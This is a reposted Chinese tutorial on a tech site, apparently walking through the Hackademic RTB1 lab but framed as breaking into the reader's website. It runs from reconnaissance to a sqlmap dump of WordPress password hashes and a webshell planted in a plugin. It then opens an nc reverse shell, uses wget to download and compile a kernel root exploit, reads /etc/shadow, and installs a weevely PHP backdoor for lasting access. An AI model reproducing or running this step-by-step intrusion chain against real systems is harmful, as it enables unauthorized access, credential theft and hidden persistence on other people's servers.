0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

黑客常用的入手思路和技术手法

Android编程精选 来源:Android编程精选 作者:Android编程精选 2022-07-27 10:44 次阅读

通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容: 1.渗透测试前的简单信息收集。 2.sqlmap的使用 3.nmap的使用 4.nc反弹提权 5.linux系统的权限提升 6.backtrack 5中渗透测试工具nikto和w3af的使用等. 假设黑客要入侵的你的网站域名为:hack-test.com 让我们用ping命令获取网站服务器的IP地址 564710fa-0cd9-11ed-ba43-dac502259ad0.jpg   现在我们获取了网站服务器的IP地址为:173.236.138.113   寻找同一服务器上的其它网站,我们使用sameip.org.   5664df0e-0cd9-11ed-ba43-dac502259ad0.jpg   26 sites hosted on IP Address 173.236.138.113  

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。 我们需要关于你网站的以下信息: 1. DNS records (A, NS, TXT, MX and SOA) 2. Web Server Type (Apache, IIS, Tomcat) 3. Registrar (the company that owns your domain) 4. Your name, address, email and phone 5. Scripts that your site uses (php, asp, asp.net, jsp, cfm) 6. Your server OS (Unix,Linux,Windows,Solaris) 7. Your server open ports to internet (80, 443, 21, etc.) 让我们开始找你网站的DNS记录,我们用who.is来完成这一目标. 56858178-0cd9-11ed-ba43-dac502259ad0.jpg   我们发现你的DNS记录如下   5694affe-0cd9-11ed-ba43-dac502259ad0.jpg    让我们来确定web服务器的类型   56a853ec-0cd9-11ed-ba43-dac502259ad0.jpg   发现你的Web服务器是apache,接下来确定它的版本.    IP: 173.236.138.113 Website Status: active Server Type: Apache Alexa Trend/Rank:  1 Month:3,213,968 3 Month: 2,161,753 Page Views per Visit:  1 Month: 2.0 3Month: 3.7   接下来是时候寻找你网站域名的注册信息,你的电话、邮箱、地址等.   56babc26-0cd9-11ed-ba43-dac502259ad0.jpg   我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.   我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.   56da4eec-0cd9-11ed-ba43-dac502259ad0.png56f80b3a-0cd9-11ed-ba43-dac502259ad0.png   我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:   1-Find services that run on server(查看服务器上运行的服务)   570b3a8e-0cd9-11ed-ba43-dac502259ad0.jpg   2-Find server OS(查看操作系统版本)   5729e0ce-0cd9-11ed-ba43-dac502259ad0.jpg   只有80端口是开放的,操作系统是Linux2.6.22(Fedora Core 6),现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:   Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.   我们将使用Nikto来收集漏洞信息:   root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com   574a97c4-0cd9-11ed-ba43-dac502259ad0.jpg   我们也会用到Backtrack 5 R1中的W3AF 工具:   root@bt:/pentest/web/w3af#./w3af_gui   575f3b0c-0cd9-11ed-ba43-dac502259ad0.jpg   我们输入要检测的网站地址,选择完整的安全审计选项.   57719b26-0cd9-11ed-ba43-dac502259ad0.jpg   稍等一会,你将会看到扫描结果.   57880e9c-0cd9-11ed-ba43-dac502259ad0.jpg    发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.   http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220   我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.   Using sqlmap with –u url   57a40dc2-0cd9-11ed-ba43-dac502259ad0.png   过一会你会看到   57b490de-0cd9-11ed-ba43-dac502259ad0.png   输入N按回车键继续   57d2e2b4-0cd9-11ed-ba43-dac502259ad0.jpg   我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.   57e7e38a-0cd9-11ed-ba43-dac502259ad0.png   57fe3a40-0cd9-11ed-ba43-dac502259ad0.png   发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名   580bb1fc-0cd9-11ed-ba43-dac502259ad0.png   582612ea-0cd9-11ed-ba43-dac502259ad0.jpg   通过参数“-T wp_users –columns ”来查看wp_users表中的字段.   583be868-0cd9-11ed-ba43-dac502259ad0.png   584ed6a8-0cd9-11ed-ba43-dac502259ad0.jpg   接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”   5861a9ea-0cd9-11ed-ba43-dac502259ad0.jpg   我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes   http://www.onlinehashcrack.com/free-hash-reverse.php   5879bfa8-0cd9-11ed-ba43-dac502259ad0.png 登陆wordpress的后台wp-admin   尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.   5889a814-0cd9-11ed-ba43-dac502259ad0.jpg58a26c46-0cd9-11ed-ba43-dac502259ad0.jpg   Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。   我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.   58b0851a-0cd9-11ed-ba43-dac502259ad0.png   然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.   58c6be0c-0cd9-11ed-ba43-dac502259ad0.jpg 点击连接我们会看到   58e26238-0cd9-11ed-ba43-dac502259ad0.png   接下来我们尝试执行一些命令:

id
uid=48(apache) gid=489(apache) groups=489(apache) (用来显示用户的id和组)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (显示服务器上当前的路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 72145 EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本信息) 58f7fc42-0cd9-11ed-ba43-dac502259ad0.jpg   现在我们知道,服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.
在服务器上测试了很多exp之后,我们用以下的exp来提升权限. http://www.exploit-db.com/exploits/15285 我们在nc shell上执行以下命令: wgethttp://www.exploit-db.com/exploits/15285 -o roro.c (下载exp到服务器并重命名为roro.c)
注:很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.
exp roro.c代码如下:

#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.”);exit(-1);}memset(&addr, 0, sizeof(addr));
通过以上代码我们发现该exp是C语言开发的,我们需要将它编译成elf格式的,命令如下: gcc roro.c –ororo 接下来执行编译好的exp ./roro 5914aed2-0cd9-11ed-ba43-dac502259ad0.jpg   执行完成之后我们输入id命令
id
我们发现我们已经是root权限了
uid=0(root) gid=0(root) 592c7152-0cd9-11ed-ba43-dac502259ad0.png   现在我们可以查看/etc/shadow文件
cat/etc/shadow 5944a060-0cd9-11ed-ba43-dac502259ad0.jpg   我们可以使用”john theripper”工具破解所有用户的密码.但是我们不会这样做,我们需要在这个服务器上留下后门以方便我们在任何时候访问它.   我们用weevely制作一个php小马上传到服务器上.   1.weevely使用选项
root@bt:/pentest/backdoors/web/weevely#./main.py - 59623c38-0cd9-11ed-ba43-dac502259ad0.jpg   2.用weevely创建一个密码为koko的php后门   root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko   596fae04-0cd9-11ed-ba43-dac502259ad0.jpg   接下来上传到服务器之后来使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko 598135de-0cd9-11ed-ba43-dac502259ad0.jpg   测试我们的hax.php后门   5993ec4c-0cd9-11ed-ba43-dac502259ad0.jpg
审核编辑:彭静
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    8017

    浏览量

    82217
  • 黑客
    +关注

    关注

    3

    文章

    276

    浏览量

    21639
  • 网络信息
    +关注

    关注

    0

    文章

    26

    浏览量

    10220

原文标题:黑客是如何攻破一个网站的?

文章出处:【微信号:AndroidPush,微信公众号:Android编程精选】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    如何构筑身份安全防线,避免被黑客“登入”企业网络?

    黑客常用的攻击手段,从用尽十八般武艺、不可告人的“侵入”,变成凭借有效账户、大摇大摆的“登入”,你会不会觉得不可思议?
    的头像 发表于 03-28 13:44 91次阅读
    如何构筑身份安全防线,避免被<b class='flag-5'>黑客</b>“登入”企业网络?

    请求黑客帮忙

    请问这里有没有可以帮我恢复之前已删除的微信聊天记录黑客高手啊?
    发表于 03-09 12:05

    物联网领域常用的定位技术有哪些?

    物联网领域常用的定位技术有哪些? 物联网领域常用的定位技术有许多,包括全球卫星导航系统(GNSS)、蜂窝网络定位、无线局域网定位、蓝牙定位、超宽带定位、射频识别(RFID)等。本文将详
    的头像 发表于 12-12 14:40 1720次阅读

    PCB布局八卦阵分析思路

    PCB布局八卦阵分析思路
    的头像 发表于 11-24 17:20 220次阅读

    DC/DC电源装置并联技术思路

    电子发烧友网站提供《DC/DC电源装置并联技术思路.doc》资料免费下载
    发表于 11-14 14:44 0次下载
    DC/DC电源装置并联<b class='flag-5'>技术</b><b class='flag-5'>思路</b>

    网络型地铁门禁设计思路

    电子发烧友网站提供《网络型地铁门禁设计思路.doc》资料免费下载
    发表于 11-10 16:04 0次下载
    网络型地铁门禁设计<b class='flag-5'>思路</b>

    ESD静电整改有什么基本思路

    ESD静电整改有什么基本思路?|深圳比创达电子EMC
    的头像 发表于 11-02 10:08 340次阅读

    电路设计的思路和原则

    在线电路设计这个词对我们来说仍稍显陌生,但提起云计算相信大家都耳熟能详了,而在线电路设计就是将专业的工程设计与云端相结合的一种设计思路,实际上这一概念和实际产品已经在欧美等国家悄然兴起并开始进入国内。接下来我给大家介绍一下电路设计的思路和原则有哪些?
    的头像 发表于 10-15 12:11 481次阅读

    浅谈2023年10种新兴威胁趋势和黑客攻击手法

    安全研究人员发现,今天的攻击者更加关注窃取数据和获取利益,因此他们在实施网络攻击时,会尽量避免给受害者带来严重的破坏,因此不再使用大范围加密数据的攻击模式,而是选择最小破坏性的攻击手法
    发表于 10-08 15:31 285次阅读

    远程升级单片机的设计思路

    上周给大家分享了《 Bootloader程序安全机制设计 》,今天为大家分享一下远程升级单片机的设计思路
    发表于 09-05 10:34 513次阅读
    远程升级单片机的设计<b class='flag-5'>思路</b>

    10大白帽黑客专用的Linux操作系统

    今天列出一些最常用、最受欢迎的Linux发行版来学习黑客和渗透测试,建议大家要遵守相关法律法规。
    发表于 08-02 09:41 215次阅读

    使用Raspberry Pi的便携式黑客

    电子发烧友网站提供《使用Raspberry Pi的便携式黑客站.zip》资料免费下载
    发表于 06-25 11:09 0次下载
    使用Raspberry Pi的便携式<b class='flag-5'>黑客</b>站

    联发科linkIt One的AWS IoT黑客系列开源分享

    电子发烧友网站提供《联发科linkIt One的AWS IoT黑客系列开源分享.zip》资料免费下载
    发表于 06-20 15:19 0次下载
    联发科linkIt One的AWS IoT<b class='flag-5'>黑客</b>系列开源分享

    bash shell脚本常用代码记录

    任何编程语言,常用的语法和代码结构其实不多的,如果为了快速的掌握入手一门编程语言,我认为只需要把该语言的常见语法和代码记下来,再结合实际需求去拼接成新的代码。
    的头像 发表于 06-01 17:49 401次阅读
    bash shell脚本<b class='flag-5'>常用</b>代码记录

    特别提醒蓝牙语音智能药盒的设计思路(二)TTS技术应用篇

    上一篇我们谈了基于蓝牙、TTS技术的智能药盒设计思路,今天我们具体聊聊TTS技术是如何应用于智能药盒,实现语音提醒病人按时用药的。 该设计思路是基于智能手机通过蓝牙与药盒互联,使用A
    的头像 发表于 04-11 11:57 426次阅读
    特别提醒蓝牙语音智能药盒的设计<b class='flag-5'>思路</b>(二)TTS<b class='flag-5'>技术</b>应用篇